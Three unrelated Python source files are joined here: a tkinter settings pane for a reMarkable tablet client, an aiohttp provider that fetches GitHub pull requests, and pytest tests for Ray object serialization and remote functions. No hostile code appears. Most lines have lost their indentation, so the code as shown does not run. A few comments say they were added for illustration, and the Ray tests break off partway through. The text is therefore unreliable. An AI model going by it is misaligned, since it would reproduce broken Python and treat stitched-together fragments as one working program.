settings.py
from datetime import date
import time
import webbrowser
import tkinter as tk
import tkinter.ttk as ttk
from tkinter import messagebox
import threading
from pathlib import Path
import api.remarkable_client
from api.remarkable_client import RemarkableClient
import utils.config as cfg
from model.item_manager import ItemManager
class Settings(object):
def __init__(self, root, font_size):
        self.rm_client = RemarkableClient()
self.item_manager = ItemManager()
root.grid_columnconfigure(4, minsize=180)
root.grid_rowconfigure(1, minsize=50)
root.grid_rowconfigure(2, minsize=30)
root.grid_rowconfigure(3, minsize=30)
root.grid_rowconfigure(4, minsize=30)
root.grid_rowconfigure(6, minsize=50)
root.grid_rowconfigure(7, minsize=30)
root.grid_rowconfigure(8, minsize=30)
root.grid_rowconfigure(9, minsize=50)
# gaps between columns
label = tk.Label(root, text=" ")
label.grid(row=1, column=1)
label = tk.Label(root, text=" ")
label.grid(row=1, column=3)
label = tk.Label(root, text=" ")
label.grid(row=1, column=5)
label = tk.Label(root, text="Authentication", font="Helvetica 14 bold")
label.grid(row=1, column=2, sticky="W")
self.onetime_code_link = "https://my.remarkable.com#desktop"
self.label_onetime_code = tk.Label(root, justify="left", anchor="w",
fg="blue", cursor="hand2", text="\nDownload one-time code from \n" + self.onetime_code_link)
self.label_onetime_code.grid(row=2, column=7, sticky="SW")
self.label_onetime_code.bind("<Button-1>", lambda e: webbrowser.open_new(self.onetime_code_link))
label = tk.Label(root, justify="left", anchor="w", text="Status: ")
label.grid(row=2, column=2, sticky="W")
self.label_auth_status = tk.Label(root, text="Unknown")
self.label_auth_status.grid(row=2, column=4, sticky="W")
label = tk.Label(root, justify="left", anchor="w", text="One-time code:")
label.grid(row=3, column=2, sticky="W")
self.entry_onetime_code_text = tk.StringVar()
self.entry_onetime_code = tk.Entry(root, textvariable=self.entry_onetime_code_text)
self.entry_onetime_code.grid(row=3, column=4, sticky="W")
self.btn_sign_in = tk.Button(root, text="Sign In", command=self.btn_sign_in_click, width=17)
self.btn_sign_in.grid(row=4, column=4, sticky="W")
label = tk.Label(root, text="General", font="Helvetica 14 bold")
label.grid(row=6, column=2, sticky="W")
label = tk.Label(root, text="Templates path:")
label.grid(row=7, column=2, sticky="W")
self.entry_templates_text = tk.StringVar()
self.entry_templates_text.set(cfg.get("general.templates", default=""))
self.entry_templates = tk.Entry(root, textvariable=self.entry_templates_text)
self.entry_templates.grid(row=7, column=4, sticky="W")
label = tk.Label(root, justify="left", anchor="w", text="A local folder that contains all template PNG files. \nYou can copy the template files from your tablet: \n'/usr/share/remarkable'")
label.grid(row=7, column=7, sticky="W")
label = tk.Label(root, text="Backup root path:")
label.grid(row=8, column=2, sticky="W")
self.backup_root_text = tk.StringVar()
        backup_root_default = Path.joinpath(Path.home(), "Backup", "Remarkable")
backup_root = cfg.get("general.backuproot", default=str(backup_root_default))
self.backup_root_text.set(backup_root)
self.entry_backup_root = tk.Entry(root, textvariable=self.backup_root_text)
self.entry_backup_root.grid(row=8, column=4, sticky="W")
label = tk.Label(root, justify="left", anchor="w", text="A local folder that will be used as the root folder for backups.")
label.grid(row=8, column=7, sticky="W")
self.btn_save = tk.Button(root, text="Save", command=self.btn_save_click, width=17)
self.btn_save.grid(row=9, column=4, sticky="W")
label = tk.Label(root, text="Backup", font="Helvetica 14 bold")
label.grid(row=10, column=2, sticky="W")
label = tk.Label(root, text="Backup path:")
label.grid(row=11, column=2, sticky="W")
self.backup_folder_text = tk.StringVar()
backup_folder = str(date.today().strftime("%Y-%m-%d"))
self.backup_folder_text.set(backup_folder)
self.entry_backup_folder = tk.Entry(root, textvariable=self.backup_folder_text)
self.entry_backup_folder.grid(row=11, column=4, sticky="W")
self.label_backup_progress = tk.Label(root)
self.label_backup_progress.grid(row=11, column=6)
label = tk.Label(root, justify="left", anchor="w", text="Copy currently downloaded and annotated PDF files \ninto the given directory. Note that those files can not \nbe restored on the tablet.")
label.grid(row=11, column=7, sticky="W")
        self.btn_create_backup = tk.Button(root, text="Create backup", command=self.btn_create_backup_click, width=17)
self.btn_create_backup.grid(row=12, column=4, sticky="W")
# Subscribe to sign in event. Outer logic (i.e. main) can try to
# sign in automatically...
self.rm_client.listen_sign_in_event(self)
#
# EVENT HANDLER
#
def sign_in_event_handler(self, event, config):
        self.btn_sign_in.config(state="normal")
self.entry_onetime_code.config(state="normal")
self.btn_create_backup.config(state="disabled")
self.btn_save.config(state="disabled")
self.entry_backup_root.config(state="disabled")
self.entry_backup_folder.config(state="disabled")
self.entry_templates.config(state="disabled")
if event == api.remarkable_client.EVENT_SUCCESS:
self.btn_sign_in.config(state="disabled")
self.entry_onetime_code.config(state="disabled")
self.btn_create_backup.config(state="normal")
self.btn_save.config(state="normal")
self.entry_backup_root.config(state="normal")
self.entry_backup_folder.config(state="normal")
self.entry_templates.config(state="normal")
self.label_auth_status.config(text="Successfully signed in", fg="green")
elif event == api.remarkable_client.EVENT_USER_TOKEN_FAILED:
self.label_auth_status.config(text="Could not renew user token\n(please try again).", fg="red")
self.entry_onetime_code.config(state="disabled")
elif event == api.remarkable_client.EVENT_ONETIMECODE_NEEDED:
self.label_auth_status.config(text="Enter one-time code.", fg="red")
else:
self.label_auth_status.config(text="Could not sign in.", fg="red")
def btn_sign_in_click(self):
onetime_code = self.entry_onetime_code_text.get()
self.rm_client.sign_in(onetime_code)
def btn_save_click(self):
general = {
"templates": self.entry_templates_text.get(),
"backuproot": self.backup_root_text.get()
}
cfg.save({"general": general})
    def btn_create_backup_click(self):
message = "If your explorer is not synchronized, some files are not included in the backup. Should we continue?"
result = messagebox.askquestion("Info", message, icon='warning')
if result != "yes":
return
backup_root = self.backup_root_text.get()
backup_folder = self.backup_folder_text.get()
backup_path = Path.joinpath(Path(backup_root), backup_folder)
self.label_backup_progress.config(text="Writing backup '%s'" % backup_path)
def run():
self.item_manager.create_backup(backup_path)
self.label_backup_progress.config(text="")
messagebox.showinfo("Info", "Successfully created backup '%s'" % backup_path)
threading.Thread(target=run).start()
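# --- Usage sketch (added for illustration; not part of the original file) ---
# A minimal, hedged example of how this Settings pane might be hosted in a
# bare Tk window. It relies only on names defined above; the window title and
# the font_size value are assumptions.
if __name__ == "__main__":
    app_root = tk.Tk()
    app_root.title("Settings")
    Settings(app_root, font_size=10)
    app_root.mainloop()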
providers.py
import json
import asyncio
import threading
from datetime import datetime
from urllib.parse import urlparse
from aiohttp import ClientSession
from backend import config, storage, const
class BaseJSONProvider:
def __init__(self, url, prov_id=None, headers=None):
self._url = urlparse(url)
self._id = prov_id if prov_id else self._url.netloc
self._headers = headers if headers else {'content-type': 'application/json'}
def __str__(self) -> str:
return self._id
def _wrap(self, data) -> dict:
"""wraps fetched data into storage-friendly dict"""
return dict(
id=self._id,
data=data,
timestamp=datetime.now().isoformat(),
)
async def _fetch_json(self, url, session) -> dict:
"""asynchronously fetches data by given url, then parses JSON response into dict"""
async with session.get(url, headers=self._headers) as response:
data = await response.read()
return json.loads(data)
def process(self, data) -> dict:
"""override this method if any processing of fetched data is required"""
return self._wrap(data)
async def collect(self) -> dict:
"""the entrypoint of the Provider class, does all work of data-gathering"""
async with ClientSession() as session:
t = asyncio.ensure_future(self._fetch_json(self._url.geturl(), session))
data = await asyncio.gather(t)
return self.process(data)
class GithubPullRequestsProvider(BaseJSONProvider):
def process(self, data):
"""override process method to extract only meaningful data
from Github's PR list response.
"""
processed = list()
for pull in data[0]:
processed.append(dict(
id=pull['number'],
author=pull['user']['login'],
created=pull['created_at'],
title=pull['title'],
))
return self._wrap(processed)
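# Illustrative shape of the dict returned by process() above; the keys follow
# _wrap() and the loop body, the values are made up:
#   {
#       "id": "<provider id>",
#       "timestamp": "2020-01-01T12:00:00",
#       "data": [{"id": 1, "author": "octocat",
#                 "created": "2020-01-01T00:00:00Z", "title": "Fix typo"}],
#   }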
async def collect_updates(cfg: config.Config, db: storage.Storage):
    # TODO: this should run forever.
    #
    # TODO: we want to look at the previous update timestamp
    # TODO: and decide whether to start the related provider or not.
tasks = [p.collect() for p in init_providers(cfg)]
for fut in asyncio.as_completed(tasks):
result = await fut
pid = result['id']
print('saving "%s" provider data' % pid)
db.save_key(pid, result)
def init_providers(cfg: config.Config):
return [
GithubPullRequestsProvider(
url=cfg.github_repo_path,
prov_id=const.GITHUB_PULLS_PROVIDER_ID,
headers={'accept': 'application/vnd.github.mercy-preview+json'}
),
]
def threaded_main(loop: asyncio.AbstractEventLoop, cfg: config.Config, db: storage.Storage):
    # bind the given event loop to this thread
asyncio.set_event_loop(loop)
# run async tasks bound to separate thread
loop.run_until_complete(collect_updates(cfg, db))
def start_background_updates(cfg: config.Config, db: storage.Storage) -> threading.Thread:
"""start background processing bound to another thread,
returns thread handle to be able to gracefully stop it
on application shutdown."""
# FIXME: need to find proper logging config and replace any `print`s
print("starting background processing thread ...")
loop = asyncio.get_event_loop()
t = threading.Thread(target=threaded_main, args=(loop, cfg, db))
t.start()
return t
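# --- Usage sketch (added for illustration; not part of the original file) ---
# A hedged sketch of how the background updater might be wired up, assuming
# config.Config() and storage.Storage() can be constructed as shown (their
# real constructors are not visible in this file):
#
#   cfg = config.Config()
#   db = storage.Storage()
#   worker = start_background_updates(cfg, db)
#   ...                     # run the rest of the application
#   worker.join()           # wait for the collection pass before shutting down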
test_basic.py
# coding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from concurrent.futures import ThreadPoolExecutor
import json
import logging
import os
import random
import re
import setproctitle
import shutil
import six
import socket
import string
import subprocess
import sys
import tempfile
import threading
import time
import numpy as np
import pickle
import pytest
import ray
import ray.tests.cluster_utils
import ray.tests.utils
from ray.utils import _random_string
logger = logging.getLogger(__name__)
@pytest.fixture
def ray_start():
# Start the Ray processes.
ray.init(num_cpus=1)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
@pytest.fixture
def shutdown_only():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
def test_simple_serialization(ray_start):
primitive_objects = [
# Various primitive types.
0,
0.0,
0.9,
1 << 62,
1 << 999,
"a",
string.printable,
"\u262F",
u"hello world",
u"\xff\xfe\x9c\x001\x000\x00",
None,
True,
False,
[],
(),
{},
type,
int,
set(),
# Collections types.
collections.Counter([np.random.randint(0, 10) for _ in range(100)]),
collections.OrderedDict([("hello", 1), ("world", 2)]),
collections.defaultdict(lambda: 0, [("hello", 1), ("world", 2)]),
collections.defaultdict(lambda: [], [("hello", 1), ("world", 2)]),
collections.deque([1, 2, 3, "a", "b", "c", 3.5]),
# Numpy dtypes.
np.int8(3),
np.int32(4),
np.int64(5),
np.uint8(3),
np.uint32(4),
np.uint64(5),
np.float32(1.9),
np.float64(1.9),
]
if sys.version_info < (3, 0):
primitive_objects.append(long(0)) # noqa: E501,F821
composite_objects = (
[[obj]
for obj in primitive_objects] + [(obj, )
for obj in primitive_objects] + [{
(): obj
} for obj in primitive_objects])
@ray.remote
def f(x):
return x
# Check that we can pass arguments by value to remote functions and
# that they are uncorrupted.
for obj in primitive_objects + composite_objects:
new_obj_1 = ray.get(f.remote(obj))
new_obj_2 = ray.get(ray.put(obj))
assert obj == new_obj_1
assert obj == new_obj_2
# TODO(rkn): The numpy dtypes currently come back as regular integers
# or floats.
if type(obj).__module__ != "numpy":
assert type(obj) == type(new_obj_1)
assert type(obj) == type(new_obj_2)
def test_complex_serialization(ray_start):
def assert_equal(obj1, obj2):
module_numpy = (type(obj1).__module__ == np.__name__
or type(obj2).__module__ == np.__name__)
if module_numpy:
empty_shape = ((hasattr(obj1, "shape") and obj1.shape == ())
or (hasattr(obj2, "shape") and obj2.shape == ()))
if empty_shape:
# This is a special case because currently
# np.testing.assert_equal fails because we do not properly
# handle different numerical types.
assert obj1 == obj2, ("Objects {} and {} are "
"different.".format(obj1, obj2))
else:
np.testing.assert_equal(obj1, obj2)
elif hasattr(obj1, "__dict__") and hasattr(obj2, "__dict__"):
special_keys = ["_pytype_"]
assert (set(list(obj1.__dict__.keys()) + special_keys) == set(
list(obj2.__dict__.keys()) + special_keys)), (
"Objects {} and {} are different.".format(obj1, obj2))
for key in obj1.__dict__.keys():
if key not in special_keys:
assert_equal(obj1.__dict__[key], obj2.__dict__[key])
elif type(obj1) is dict or type(obj2) is dict:
assert_equal(obj1.keys(), obj2.keys())
for key in obj1.keys():
assert_equal(obj1[key], obj2[key])
elif type(obj1) is list or type(obj2) is list:
assert len(obj1) == len(obj2), ("Objects {} and {} are lists with "
"different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif type(obj1) is tuple or type(obj2) is tuple:
assert len(obj1) == len(obj2), ("Objects {} and {} are tuples "
"with different lengths.".format(
obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
elif (ray.serialization.is_named_tuple(type(obj1))
or ray.serialization.is_named_tuple(type(obj2))):
assert len(obj1) == len(obj2), (
"Objects {} and {} are named "
"tuples with different lengths.".format(obj1, obj2))
for i in range(len(obj1)):
assert_equal(obj1[i], obj2[i])
else:
assert obj1 == obj2, "Objects {} and {} are different.".format(
obj1, obj2)
if sys.version_info >= (3, 0):
long_extras = [0, np.array([["hi", u"hi"], [1.3, 1]])]
else:
long_extras = [
long(0), # noqa: E501,F821
np.array([
["hi", u"hi"],
[1.3, long(1)] # noqa: E501,F821
])
]
PRIMITIVE_OBJECTS = [
0, 0.0, 0.9, 1 << 62, 1 << 100, 1 << 999, [1 << 100, [1 << 100]], "a",
string.printable, "\u262F", u"hello world",
u"\xff\xfe\x9c\x001\x000\x00", None, True, False, [], (), {},
np.int8(3),
np.int32(4),
np.int64(5),
np.uint8(3),
np.uint32(4),
np.uint64(5),
np.float32(1.9),
np.float64(1.9),
np.zeros([100, 100]),
np.random.normal(size=[100, 100]),
np.array(["hi", 3]),
np.array(["hi", 3], dtype=object)
] + long_extras
COMPLEX_OBJECTS = [
[[[[[[[[[[[[]]]]]]]]]]]],
{
"obj{}".format(i): np.random.normal(size=[100, 100])
for i in range(10)
},
# {(): {(): {(): {(): {(): {(): {(): {(): {(): {(): {
# (): {(): {}}}}}}}}}}}}},
(
(((((((((), ), ), ), ), ), ), ), ), ),
{
"a": {
"b": {
"c": {
"d": {}
}
}
}
},
]
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
class Bar(object):
def __init__(self):
for i, val in enumerate(PRIMITIVE_OBJECTS + COMPLEX_OBJECTS):
setattr(self, "field{}".format(i), val)
class Baz(object):
def __init__(self):
self.foo = Foo()
self.bar = Bar()
def method(self, arg):
pass
class Qux(object):
def __init__(self):
self.objs = [Foo(), Bar(), Baz()]
class SubQux(Qux):
def __init__(self):
Qux.__init__(self)
class CustomError(Exception):
pass
Point = collections.namedtuple("Point", ["x", "y"])
NamedTupleExample = collections.namedtuple(
"Example", "field1, field2, field3, field4, field5")
CUSTOM_OBJECTS = [
Exception("Test object."),
CustomError(),
Point(11, y=22),
Foo(),
Bar(),
Baz(), # Qux(), SubQux(),
NamedTupleExample(1, 1.0, "hi", np.zeros([3, 5]), [1, 2, 3]),
]
# Test dataclasses in Python 3.7.
if sys.version_info >= (3, 7):
from dataclasses import make_dataclass
DataClass0 = make_dataclass("DataClass0", [("number", int)])
CUSTOM_OBJECTS.append(DataClass0(number=3))
class CustomClass(object):
def __init__(self, value):
self.value = value
DataClass1 = make_dataclass("DataClass1", [("custom", CustomClass)])
class DataClass2(DataClass1):
@classmethod
def from_custom(cls, data):
custom = CustomClass(data)
return cls(custom)
def __reduce__(self):
return (self.from_custom, (self.custom.value, ))
CUSTOM_OBJECTS.append(DataClass2(custom=CustomClass(43)))
BASE_OBJECTS = PRIMITIVE_OBJECTS + COMPLEX_OBJECTS + CUSTOM_OBJECTS
LIST_OBJECTS = [[obj] for obj in BASE_OBJECTS]
TUPLE_OBJECTS = [(obj, ) for obj in BASE_OBJECTS]
# The check that type(obj).__module__ != "numpy" should be unnecessary, but
# otherwise this seems to fail on Mac OS X on Travis.
DICT_OBJECTS = ([{
obj: obj
} for obj in PRIMITIVE_OBJECTS if (
obj.__hash__ is not None and type(obj).__module__ != "numpy")] + [{
0: obj
} for obj in BASE_OBJECTS] + [{
Foo(123): Foo(456)
}])
RAY_TEST_OBJECTS = (
BASE_OBJECTS + LIST_OBJECTS + TUPLE_OBJECTS + DICT_OBJECTS)
@ray.remote
def f(x):
return x
# Check that we can pass arguments by value to remote functions and
# that they are uncorrupted.
for obj in RAY_TEST_OBJECTS:
assert_equal(obj, ray.get(f.remote(obj)))
assert_equal(obj, ray.get(ray.put(obj)))
def test_ray_recursive_objects(ray_start):
class ClassA(object):
pass
# Make a list that contains itself.
lst = []
lst.append(lst)
# Make an object that contains itself as a field.
a1 = ClassA()
a1.field = a1
# Make two objects that contain each other as fields.
a2 = ClassA()
a3 = ClassA()
a2.field = a3
a3.field = a2
# Make a dictionary that contains itself.
d1 = {}
d1["key"] = d1
# Create a list of recursive objects.
recursive_objects = [lst, a1, a2, a3, d1]
# Check that exceptions are thrown when we serialize the recursive
# objects.
for obj in recursive_objects:
with pytest.raises(Exception):
ray.put(obj)
def test_passing_arguments_by_value_out_of_the_box(ray_start):
@ray.remote
def f(x):
return x
# Test passing lambdas.
def temp():
return 1
assert ray.get(f.remote(temp))() == 1
assert ray.get(f.remote(lambda x: x + 1))(3) == 4
# Test sets.
assert ray.get(f.remote(set())) == set()
s = {1, (1, 2, "hi")}
assert ray.get(f.remote(s)) == s
# Test types.
assert ray.get(f.remote(int)) == int
assert ray.get(f.remote(float)) == float
assert ray.get(f.remote(str)) == str
class Foo(object):
def __init__(self):
pass
# Make sure that we can put and get a custom type. Note that the result
# won't be "equal" to Foo.
ray.get(ray.put(Foo))
def test_putting_object_that_closes_over_object_id(ray_start):
# This test is here to prevent a regression of
# https://github.com/ray-project/ray/issues/1317.
class Foo(object):
def __init__(self):
self.val = ray.put(0)
def method(self):
f
f = Foo()
ray.put(f)
def test_put_get(shutdown_only):
ray.init(num_cpus=0)
for i in range(100):
value_before = i * 10**6
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = i * 10**6 * 1.0
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = "h" * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = [1] * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
def test_custom_serializers(shutdown_only):
ray.init(num_cpus=1)
class Foo(object):
def __init__(self):
self.x = 3
def custom_serializer(obj):
return 3, "string1", type(obj).__name__
def custom_deserializer(serialized_obj):
return serialized_obj, "string2"
ray.register_custom_serializer(
Foo, serializer=custom_serializer, deserializer=custom_deserializer)
assert ray.get(ray.put(Foo())) == ((3, "string1", Foo.__name__), "string2")
class Bar(object):
def __init__(self):
self.x = 3
ray.register_custom_serializer(
Bar, serializer=custom_serializer, deserializer=custom_deserializer)
@ray.remote
def f():
return Bar()
assert ray.get(f.remote()) == ((3, "string1", Bar.__name__), "string2")
def test_serialization_final_fallback(ray_start):
pytest.importorskip("catboost")
# This test will only run when "catboost" is installed.
from catboost import CatBoostClassifier
model = CatBoostClassifier(
iterations=2,
depth=2,
learning_rate=1,
loss_function="Logloss",
logging_level="Verbose")
reconstructed_model = ray.get(ray.put(model))
assert set(model.get_params().items()) == set(
reconstructed_model.get_params().items())
def test_register_class(shutdown_only):
ray.init(num_cpus=2)
    # Check that we can put and get an object of a class that has not
    # been explicitly registered.
class TempClass(object):
pass
ray.get(ray.put(TempClass()))
# Test passing custom classes into remote functions from the driver.
@ray.remote
def f(x):
return x
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
foo = ray.get(f.remote(Foo(7)))
assert foo == Foo(7)
regex = re.compile(r"\d+\.\d*")
new_regex = ray.get(f.remote(regex))
# This seems to fail on the system Python 3 that comes with
# Ubuntu, so it is commented out for now:
# assert regex == new_regex
# Instead, we do this:
assert regex.pattern == new_regex.pattern
class TempClass1(object):
def __init__(self):
self.value = 1
# Test returning custom classes created on workers.
@ray.remote
def g():
class TempClass2(object):
def __init__(self):
self.value = 2
return TempClass1(), TempClass2()
object_1, object_2 = ray.get(g.remote())
assert object_1.value == 1
assert object_2.value == 2
# Test exporting custom class definitions from one worker to another
# when the worker is blocked in a get.
class NewTempClass(object):
def __init__(self, value):
self.value = value
@ray.remote
def h1(x):
return NewTempClass(x)
@ray.remote
def h2(x):
return ray.get(h1.remote(x))
assert ray.get(h2.remote(10)).value == 10
# Test registering multiple classes with the same name.
@ray.remote(num_return_vals=3)
def j():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = []
for _ in range(5):
results += j.remote()
for i in range(len(results) // 3):
c0, c1, c2 = ray.get(results[(3 * i):(3 * (i + 1))])
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
@ray.remote
def k():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = ray.get([k.remote() for _ in range(5)])
for c0, c1, c2 in results:
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
def test_keyword_args(shutdown_only):
@ray.remote
def keyword_fct1(a, b="hello"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct2(a="hello", b="world"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct3(a, b, c="hello", d="world"):
return "{} {} {} {}".format(a, b, c, d)
ray.init(num_cpus=1)
x = keyword_fct1.remote(1)
assert ray.get(x) == "1 hello"
x = keyword_fct1.remote(1, "hi")
assert ray.get(x) == "1 hi"
x = keyword_fct1.remote(1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct1.remote(a=1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct2.remote(a="w", b="hi")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(b="hi", a="w")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(a="w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote(b="hi")
assert ray.get(x) == "hello hi"
x = keyword_fct2.remote("w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote("w", "hi")
assert ray.get(x) == "w hi"
x = keyword_fct3.remote(0, 1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(a=0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, d="hi", c="w")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, c="w")
assert ray.get(x) == "0 1 w world"
x = keyword_fct3.remote(0, 1, d="hi")
assert ray.get(x) == "0 1 hello hi"
x = keyword_fct3.remote(0, 1)
assert ray.get(x) == "0 1 hello world"
x = keyword_fct3.remote(a=0, b=1)
assert ray.get(x) == "0 1 hello world"
# Check that we cannot pass invalid keyword arguments to functions.
@ray.remote
def f1():
return
@ray.remote
def f2(x, y=0, z=0):
return
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f1.remote(3)
with pytest.raises(Exception):
f1.remote(x=3)
with pytest.raises(Exception):
f2.remote(0, w=0)
with pytest.raises(Exception):
f2.remote(3, x=3)
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f2.remote(1, 2, 3, 4)
@ray.remote
def f3(x):
return x
assert ray.get(f3.remote(4)) == 4
def test_variable_number_of_args(shutdown_only):
@ray.remote
def varargs_fct1(*a):
return " ".join(map(str, a))
@ray.remote
def varargs_fct2(a, *b):
return " ".join(map(str, b))
try:
@ray.remote
def kwargs_throw_exception(**c):
return ()
kwargs_exception_thrown = False
except Exception:
kwargs_exception_thrown = True
ray.init(num_cpus=1)
x = varargs_fct1.remote(0, 1, 2)
assert ray.get(x) == "0 1 2"
x = varargs_fct2.remote(0, 1, 2)
assert ray.get(x) == "1 2"
assert kwargs_exception_thrown
@ray.remote
def f1(*args):
return args
@ray.remote
def f2(x, y, *args):
return x, y, args
assert ray.get(f1.remote()) == ()
assert ray.get(f1.remote(1)) == (1, )
assert ray.get(f1.remote(1, 2, 3)) == (1, 2, 3)
with pytest.raises(Exception):
f2.remote()
with pytest.raises(Exception):
f2.remote(1)
assert ray.get(f2.remote(1, 2)) == (1, 2, ())
assert ray.get(f2.remote(1, 2, 3)) == (1, 2, (3, ))
assert ray.get(f2.remote(1, 2, 3, 4)) == (1, 2, (3, 4))
def test_no_args(shutdown_only):
    ray.init(num_cpus=1)
    @ray.remote
    def no_op():
        pass
    ray.get(no_op.remote())
def test_defining_remote_functions(shutdown_only):
ray.init(num_cpus=3)
# Test that we can define a remote function in the shell.
@ray.remote
def f(x):
return x + 1
assert ray.get(f.remote(0)) == 1
# Test that we can redefine the remote function.
@ray.remote
def f(x):
return x + 10
while True:
val = ray.get(f.remote(0))
assert val in [1, 10]
if val == 10:
break
else:
logger.info("Still using old definition of f, trying again.")
# Test that we can close over plain old data.
data = [
np.zeros([3, 5]), (1, 2, "a"), [0.0, 1.0, 1 << 62], 1 << 60, {
"a": np.zeros(3)
}
]
@ray.remote
def g():
return data
ray.get(g.remote())
# Test that we can close over modules.
@ray.remote
def h():
return np.zeros([3, 5])
assert np.alltrue(ray.get(h.remote()) == np.zeros([3, 5]))
@ray.remote
def j():
return time.time()
ray.get(j.remote())
# Test that we can define remote functions that call other remote
# functions.
@ray.remote
def k(x):
return x + 1
@ray.remote
def k2(x):
return ray.get(k.remote(x))
@ray.remote
def m(x):
return ray.get(k2.remote(x))
assert ray.get(k.remote(1)) == 2
assert ray.get(k2.remote(1)) == 2
assert ray.get(m.remote(1)) == 2
def test_submit_api(shutdown_only):
ray.init(num_cpus=1, num_gpus=1, resources={"Custom": 1})
@ray.remote
def f(n):
return list(range(n))
@ray.remote
def g():
return ray.get_gpu_ids()
assert f._remote([0], num_return_vals=0) is None
id1 = f._remote(args=[1], num_return_vals=1)
assert ray.get(id1) == [0]
id1, id2 = f._remote(args=[2], num_return_vals=2)
assert ray.get([id1, id2]) == [0, 1]
id1, id2, id3 = f._remote(args=[3], num_return_vals=3)
assert ray.get([id1, id2, id3]) == [0, 1, 2]
assert ray.get(
g._remote(
args=[], num_cpus=1, num_gpus=1,
resources={"Custom": 1})) == [0]
infeasible_id = g._remote(args=[], resources={"NonexistentCustom": 1})
ready_ids, remaining_ids = ray.wait([infeasible_id], timeout=0.05)
assert len(ready_ids) == 0
assert len(remaining_ids) == 1
@ray.remote
class Actor(object):
def __init__(self, x, y=0):
self.x = x
self.y = y
def method(self, a, b=0):
return self.x, self.y, a, b
def gpu_ids(self):
return ray.get_gpu_ids()
a = Actor._remote(
args=[0], kwargs={"y": 1}, num_gpus=1, resources={"Custom": 1})
id1, id2, id3, id4 = a.method._remote(
args=["test"], kwargs={"b": 2}, num_return_vals=4)
assert ray.get([id1, id2, id3, id4]) == [0, 1, "test", 2]
def test_get_multiple(shutdown_only):
ray.init(num_cpus=1)
object_ids = [ray.put(i) for i in range(10)]
assert ray.get(object_ids) == list(range(10))
# Get a random choice of object IDs with duplicates.
indices = list(np.random.choice(range(10), 5))
indices += indices
results = ray.get([object_ids[i] for i in indices])
assert results == indices
def test_get_multiple_experimental(shutdown_only):
ray.init(num_cpus=1)
object_ids = [ray.put(i) for i in range(10)]
object_ids_tuple = tuple(object_ids)
assert ray.experimental.get(object_ids_tuple) == list(range(10))
object_ids_nparray = np.array(object_ids)
assert ray.experimental.get(object_ids_nparray) == list(range(10))
def test_get_dict(shutdown_only):
ray.init(num_cpus=1)
d = {str(i): ray.put(i) for i in range(5)}
for i in range(5, 10):
d[str(i)] = i
result = ray.experimental.get(d)
expected = {str(i): i for i in range(10)}
assert result == expected
def test_wait(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
ready_ids, remaining_ids = ray.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
ready_ids, remaining_ids = ray.wait(objectids, num_returns=4)
assert set(ready_ids) == set(objectids)
assert remaining_ids == []
objectids = [f.remote(0.5), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=1.75, num_returns=4)
assert time.time() - start_time < 2
assert len(ready_ids) == 3
assert len(remaining_ids) == 1
ray.wait(objectids)
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=5.0)
assert time.time() - start_time < 5
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
# Verify that calling wait with duplicate object IDs throws an
# exception.
x = ray.put(1)
with pytest.raises(Exception):
ray.wait([x, x])
# Make sure it is possible to call wait with an empty list.
ready_ids, remaining_ids = ray.wait([])
assert ready_ids == []
assert remaining_ids == []
# Test semantics of num_returns with no timeout.
oids = [ray.put(i) for i in range(10)]
(found, rest) = ray.wait(oids, num_returns=2)
assert len(found) == 2
assert len(rest) == 8
# Verify that incorrect usage raises a TypeError.
x = ray.put(1)
